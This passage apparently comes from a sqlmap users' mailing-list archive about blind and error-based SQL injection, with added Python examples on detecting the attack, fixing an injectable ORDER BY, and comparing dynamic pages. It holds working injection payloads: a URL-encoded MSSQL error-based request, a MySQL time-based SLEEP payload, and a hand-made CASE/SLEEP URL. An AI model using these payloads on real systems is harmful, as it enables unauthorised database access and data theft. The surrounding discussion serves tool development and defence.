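    "accountNumber="
    "%28CONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28100%29%2BCHAR%2858%29"
    "%2B%28SELECT%20master.sys.fn_varbintohexstr%28CAST%28COUNT%28master..sysusers.name%2BCHAR%2846%29"
    "%2Bmaster..sysobjects.name%29%20AS%20VARBINARY%28MAX%29%29%29%20FROM%20master..sysobjects%20INNER"
    "%20JOIN%20master..sysusers%20ON%20master..sysobjects.uid%20%3D%20master..sysusers.uid%20WHERE"
    "%20master..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%28118%29%29%29%2BCHAR%2858%29"
    "%2BCHAR%28100%29%2BCHAR%28111%29%2BCHAR%28103%29%2BCHAR%2858%29%29%29%29"
    "&meterNumber=1111111&zipCode=78451&email=user%40example.test&register=Register"
)
ERROR_RESPONSE = ("[Macromedia][SQLServer JDBC Driver][SQLServer]Conversion failed when "
                  "converting the nvarchar value ':omd:0x00000167:dog:' to data type int.")

if __name__ == "__main__":
    print(error_based_indicators(COUNT_REQUEST)["decoded"])
    print(analyze(COUNT_REQUEST, 500, ERROR_RESPONSE))
```

The decoded query reads as a plain COUNT over user tables and views (xtype IN ('u','v')) with its result hex-encoded, and the 500 response hands back 0x00000167, i.e. 359; seeing the driver's error text in a client response is the finding to fix on the application side.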
From: Miroslav S. <mir...@gm...> - 2013-02-21 17:18:46
Hi.

You haven't told us anything that could help. Neither switches/options used, nor tamper scripts used, nothing. You are using some custom tamper script(s), as I can see "/*!50000" in the payload (we don't have this in our tamper scripts). Nevertheless, I've tried to reproduce your run with --technique=T --tamper="between,versionedmorekeywords,ifnull2ifisnull" --dbs against our testing environment and everything works out of the box.

Kind regards,
Miroslav Stampar

On Thu, Feb 21, 2013 at 5:22 PM, Кирилл Бельков <li...@gm...> wrote:
> [...]

--
Miroslav Stampar
http://about.me/stamparm
From: Кирилл Б. <li...@gm...> - 2013-02-21 16:22:30
Hello, all.

I'm trying to exploit the blind injection in the following query:

$var = $_GET['var'];
SELECT id,name FROM people ORDER BY $var

sqlmap finds vulnerabilities, but they cannot be used.

sqlmap sends the following query:

name AND 561/*!50000=*/IF((ORD(MID((/*!50000SELECT*/ IF(ISNULL(/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS CHAR)),CHAR(32),/*!50000CAST*/(/*!50000COUNT*/(DISTINCT(schema_name)) AS CHAR)) FROM /*!50000information_schema*/.SCHEMATA),1,1)) NOT BETWEEN 0 AND 1),SLEEP(5),561)

[22:20:36] [ERROR] unable to retrieve the number of databases

but it does not work. Maybe some kind of filter interferes.

But my request in the browser URL:

index.php?var=CASE WHEN (SELECT ASCII(SUBSTRING(schema_name, 1, 1)) FROM /*!50000information_schema*/.SCHEMATA limit 0,1) NOT BETWEEN 0 AND 65 THEN sleep(10) ELSE date END

It takes a successful ... How can I get sqlmap to use my method of attack instead of the one it uses by default?

Sincerely, Kirill

p.s. sorry for my bad English
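The query in Kirill's post, SELECT id,name FROM people ORDER BY $var, cannot be fixed with a bound parameter because ORDER BY takes an identifier, not a value; the fix on the application side is to map the user's input onto a fixed list of allowed columns and directions and reject everything else. This is an added example in Python with sqlite3 (not from the thread, whose application is PHP/MySQL); the people table and its rows are constructed here.

```python
import sqlite3

# The only identifiers that may ever reach the ORDER BY clause (constructed for the example).
ALLOWED_SORT_COLUMNS = {"id": "id", "name": "name"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(sort: str, direction: str = "asc") -> str:
    """Map untrusted input to a known identifier; anything else is rejected outright."""
    try:
        column = ALLOWED_SORT_COLUMNS[sort.lower()]
        order = ALLOWED_DIRECTIONS[direction.lower()]
    except KeyError as exc:
        raise ValueError(f"unsupported sort parameter: {exc.args[0]!r}") from None
    # Only values taken from the allow-lists are interpolated, never the raw input.
    return f"ORDER BY {column} {order}"


def list_people(conn: sqlite3.Connection, sort: str, direction: str = "asc") -> list:
    """The thread's 'SELECT id,name FROM people ORDER BY $var', done safely."""
    sql = "SELECT id, name FROM people " + build_order_by(sort, direction)
    return conn.execute(sql).fetchall()


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE people (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO people VALUES (?, ?)",
                     [(1, "Zoe"), (2, "Adam"), (3, "Maria")])
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    print(list_people(conn, "name"))
    # Input shaped like the payload in the thread never reaches the database:
    try:
        list_people(conn, "name AND 561/*!50000=*/IF(1,SLEEP(5),561)")
    except ValueError as err:
        print("rejected:", err)
```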
From: Julius K. <jul...@gm...> - 2013-02-20 14:46:07
User specified regexps?

2013/2/20 Miroslav Stampar <mir...@gm...>
> [...]
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:22:17
p.s.: https://github.com/sqlmapproject/sqlmap/issues/298

On Wed, Feb 20, 2013 at 3:16 PM, Miroslav Stampar <mir...@gm...> wrote:
> [...]

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:16:43
Andres.

On Wed, Feb 20, 2013 at 3:11 PM, Andres Riancho <and...@gm...> wrote:
> Miroslav,
>
> On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar
> <mir...@gm...> wrote:
> > Hi.
> >
> > In theory this works, in practice it doesn't. We already overturned 2-3 guys
> > proposing this. Today's pages are too dynamic (banners, promos, etc.).
>
> But sqlmap already supports comparing pages with minor differences
> (using difflib, correct?)

Yes, and it does the best among all tools.

> > Also,
> > you would need a parameter value with a big covering range (lots of
> > different values).
>
> 256 different rows for a table doesn't seem to be something difficult
> to find; while not possible in all cases I agree.

It's difficult to find, trust me. Also, how to "differentiate" 256 different cases when you have 256 different cases of BANNERs in plain refresh of pages.

> > Also, whoever wrote this doesn't have a clue about this subject: 'The
> > attacker would then take a checksum of the returned html data'. This is
> > being done in kiddish scripts. Real SQLi tool knows that checksum is faaar
> > from reliable.
>
> See difflib above.

Seen

> > Anyway, answer is no.
>
> I think you're disregarding a good idea (if correctly implemented it
> provides an 8-times performance improvement) way too fast.
> Implementation is going to be difficult, but the benefits are great,

I am not disregarding a good idea. It's good in THEORY, but not in practice (THEORY != PRACTICE). You can make a tool of your own and try it yourself on real life web sites. I am sure that you'll be disappointed really quickly.

Anyway, it's not a practical idea at all. Cold fusion is also a great idea. Maybe that would be smarter to implement than this one.

Bye

> > Kind regards,
> > Miroslav Stampar
> >
> > On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...>
> > wrote:
> >>
> >> Should probably look into adding this,
> >> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
> >>
>
> --
> Andrés Riancho
> Project Leader at w3af - http://w3af.org/
> Web Application Attack and Audit Framework
> Twitter: @w3af
> GPG: 0x93C344F3

--
Miroslav Stampar
http://about.me/stamparm
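The disagreement above is about how reliably two responses can be told apart: a checksum changes whenever a banner or request id changes, which is Miroslav's objection, while a difflib ratio tolerates small differences, which is what Andres points to. The Python below is an added example, not sqlmap's code (sqlmap's own dynamic-content handling is, to my understanding, built on the same difflib matching-blocks idea, but this is a simplified stand-in): it learns the dynamic regions from two refreshes of the same constructed page, strips them from later responses, and only then compares checksums, so a banner change no longer looks like a different page while a different result still does.

```python
import difflib
import hashlib

# Constructed page template: the promo banner and the per-request id rotate on
# every refresh, while the lookup result is the part that carries information.
PREFIX = '<html><body><div id="promo">'
MIDDLE = '</div><h1>Account lookup</h1><p id="result">'
TAIL = '</p><small>req '
SUFFIX = '</small></body></html>'


def render(result: str, banner: str, req_id: str) -> str:
    return PREFIX + banner + MIDDLE + result + TAIL + req_id + SUFFIX


def checksum(page: str) -> str:
    """The naive comparison the thread criticises: any byte change breaks it."""
    return hashlib.sha256(page.encode()).hexdigest()


def similarity(a: str, b: str) -> float:
    """difflib ratio: 1.0 for identical pages, tolerant of small differences."""
    return difflib.SequenceMatcher(None, a, b, autojunk=False).ratio()


def dynamic_regions(a: str, b: str, min_match: int = 8) -> list:
    """Spans of `a` not covered by a stable (long enough) matching block in `b`."""
    sm = difflib.SequenceMatcher(None, a, b, autojunk=False)
    regions, pos = [], 0
    for i, _j, n in sm.get_matching_blocks():
        if 0 < n < min_match:
            continue  # a few shared characters inside a banner are not an anchor
        if i > pos:
            regions.append((pos, i))
        pos = i + n
    return regions


def dynamic_markers(a: str, b: str, ctx: int = 12) -> list:
    """Turn each dynamic span into (prefix, suffix) context that can be located later."""
    return [(a[max(0, s - ctx):s], a[e:e + ctx]) for s, e in dynamic_regions(a, b)]


def strip_dynamic(page: str, markers: list) -> str:
    """Cut everything between each prefix/suffix pair out of a fresh response."""
    for prefix, suffix in markers:
        i = page.find(prefix)
        if i < 0:
            continue
        i += len(prefix)
        if suffix == "":          # dynamic content ran to the end of the page
            page = page[:i]
            continue
        j = page.find(suffix, i)
        if j >= 0:
            page = page[:i] + page[j:]
    return page


def same_response(base: str, other: str, markers: list) -> bool:
    """Checksum comparison after removing the parts known to change on refresh."""
    return checksum(strip_dynamic(base, markers)) == checksum(strip_dynamic(other, markers))


# Two refreshes of the same logical page (constructed), then two later responses.
PAGE_A = render("Account 4906 found", "Spring sale: 20% off", "8f3a91c2")
PAGE_B = render("Account 4906 found", "Free shipping this week", "07bd44e1")
PAGE_C = render("Account 4906 found", "Clearance: everything must go", "5e0d9ab7")
PAGE_D = render("No such account", "Spring sale: 20% off", "8f3a91c2")

if __name__ == "__main__":
    markers = dynamic_markers(PAGE_A, PAGE_B)
    print("raw checksums equal:", checksum(PAGE_A) == checksum(PAGE_B))
    print("difflib ratio A/B:  ", round(similarity(PAGE_A, PAGE_B), 3))
    print("A vs C after strip: ", same_response(PAGE_A, PAGE_C, markers))
    print("A vs D after strip: ", same_response(PAGE_A, PAGE_D, markers))
```

Raw checksums of A and B differ although both say the same thing, which is the "checksum is far from reliable" point; after the learned banner and request-id regions are cut out, C matches A and D does not.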